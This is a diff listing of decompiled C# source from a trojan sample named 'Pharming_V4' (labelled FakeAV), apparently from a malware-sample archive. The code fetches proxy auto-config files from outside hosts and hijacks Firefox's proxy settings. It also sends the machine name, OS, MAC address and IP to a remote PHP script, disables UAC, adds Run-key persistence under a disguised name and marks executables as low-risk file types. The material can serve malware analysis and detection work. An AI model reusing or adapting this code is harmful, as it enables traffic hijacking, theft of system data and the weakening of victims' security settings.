using System.Net;
using System.Threading;
namespace Pharming_V4
{
[StandardModule]
internal sealed class atproxy
{
public static string pac1;
public static string pac2;
public static string pac3;
public static string pac4;
public static string pac5;
public static string pacfinal;
public static void atproxy()
{
string tempPath = Path.GetTempPath();
Pharming_V4.atproxy.pac1 = "http://www.tudolinux.com/p.txt";
Pharming_V4.atproxy.pac2 = "http://www.tudolinux.com/p.txt";
Pharming_V4.atproxy.pac3 = "http://www.tudominerim.com/p.txt";
Pharming_V4.atproxy.pac4 = "http://www.tudominerim.com/p.txt";
Pharming_V4.atproxy.pac5 = "http://www.tudominerim.com/p.txt";
Random random = new Random();
while (true)
{
do
{
int num;
do
{
num = random.Next(1, 5);
if (num == 1)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac1, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac1);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac1;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 2)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac2, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac2);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac2;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 3)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac3, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac3);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac3;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
else if (num == 4)
{
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac4, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (System.IO.File.Exists(tempPath + "\\config.jsp"))
{
StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp");
string end = streamReader.ReadToEnd();
streamReader.Close();
if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac4);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac4;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
}
while (num != 5);
try
{
new WebClient().DownloadFile(Pharming_V4.atproxy.pac5, tempPath + "\\config.jsp");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
while (!System.IO.File.Exists(tempPath + "\\config.jsp"));
StreamReader streamReader1 = new StreamReader(tempPath + "\\config.jsp");
string end1 = streamReader1.ReadToEnd();
streamReader1.Close();
if (end1.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d"))
{
Module1.a(Pharming_V4.atproxy.pac5);
Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac5;
Process[] processesByName = Process.GetProcessesByName("firefox");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
firefox.firefox();
Thread.Sleep(1000000);
}
else
Console.WriteLine("Atualizado");
}
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/criatxtinfect.cs
+35
View File
@@ -0,0 +1,35 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.criatxtinfect
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
namespace Pharming_V4
{
[StandardModule]
internal sealed class criatxtinfect
{
public static void criatxtinfect()
{
string path = Path.GetTempPath() + "\\checkinfect.txt";
try
{
if (File.Exists(path))
return;
using (File.Create(path))
;
using (StreamWriter streamWriter = new StreamWriter(path))
streamWriter.Write("infected");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/enviophp.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.enviophp
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Net;
using System.Net.NetworkInformation;
namespace Pharming_V4
{
[StandardModule]
internal sealed class enviophp
{
public static void enviophp()
{
if (System.IO.File.Exists(Path.GetTempPath() + "\\checkinfect.txt"))
{
Console.WriteLine("Ja infectado!");
}
else
{
string end = new StreamReader(((HttpWebResponse) ((HttpWebRequest) WebRequest.Create("http://automation.whatismyip.com/n09230945.asp")).GetResponse()).GetResponseStream()).ReadToEnd();
string str = NetworkInterface.GetAllNetworkInterfaces()[0].GetPhysicalAddress().ToString();
new WebClient().DownloadString("http://www.shaunsmyth.com/images/home/novo.php?nomepc=" + Environment.MachineName + "&osName=" + Module1.osName + "&netCard=" + str + "&ipp=" + end);
}
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/firefox.cs
+78
View File
@@ -0,0 +1,78 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.firefox
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
namespace Pharming_V4
{
[StandardModule]
internal sealed class firefox
{
public static void firefox()
{
Process[] processesByName = Process.GetProcessesByName(nameof (firefox));
int index1 = 0;
while (index1 < processesByName.Length)
{
processesByName[index1].Kill();
checked { ++index1; }
}
string str = "";
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles\\");
int index2 = 0;
while (index2 < directories.Length)
{
str = directories[index2];
checked { ++index2; }
}
StreamReader streamReader = new StreamReader(str + "\\prefs.js");
string end = streamReader.ReadToEnd();
streamReader.Close();
string path = str + "\\pending.js";
if (end.Contains("user_pref(\"network.proxy.type\", 1);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 1);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 2);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 2);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 3);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 3);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 4);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 4);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else if (end.Contains("user_pref(\"network.proxy.type\", 5);"))
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine(end.Replace("user_pref(\"network.proxy.type\", 5);", "user_pref(\"network.proxy.type\", 5);"));
streamWriter.Close();
}
else
{
StreamWriter streamWriter = new StreamWriter(path, false);
streamWriter.WriteLine("user_pref(\"network.proxy.type\", 5);");
streamWriter.Close();
}
File.Delete(str + "\\prefs.js");
File.Move(str + "\\pending.js", str + "\\prefs.js");
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/pharmantiga.cs
+51
View File
@@ -0,0 +1,51 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.pharmantiga
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
namespace Pharming_V4
{
[StandardModule]
internal sealed class pharmantiga
{
public static void pharmantiga()
{
try
{
Process[] processesByName = Process.GetProcessesByName("windowsfiledk");
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue("www.msn.com");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", true);
registryKey1.SetValue("EnableLUA", (object) 0);
registryKey1.Close();
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Security Center", true);
registryKey2.SetValue("UacDisableNotify", (object) 0);
registryKey2.Close();
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/pharmnova.cs
+35
View File
@@ -0,0 +1,35 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.pharmnova
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using Pharming_V4.My;
using System;
using System.Reflection;
namespace Pharming_V4
{
[StandardModule]
internal sealed class pharmnova
{
public static void pharmnova()
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
try
{
MyProject.Computer.FileSystem.CopyFile(Assembly.GetExecutingAssembly().Location, folderPath + "\\telefx\\Config.com", true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Config", (object) ("\"" + folderPath + "\\telefx\\Config.com\" -autorun"));
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations");
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations", true).SetValue("LowRiskFileTypes", (object) ".exe;.com;.scr");
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/phpenvioinfect.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.phpenvioinfect
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
namespace Pharming_V4
{
[StandardModule]
internal sealed class phpenvioinfect
{
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/smtpenvioinfect.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.smtpenvioinfect
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
namespace Pharming_V4
{
[StandardModule]
internal sealed class smtpenvioinfect
{
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/so.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.so
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Pharming_V4.My;
namespace Pharming_V4
{
[StandardModule]
internal sealed class so
{
public static void so() => Module1.osName = MyProject.Computer.Info.OSFullName;
}
}

Some files were not shown because too many files have changed in this diff Show More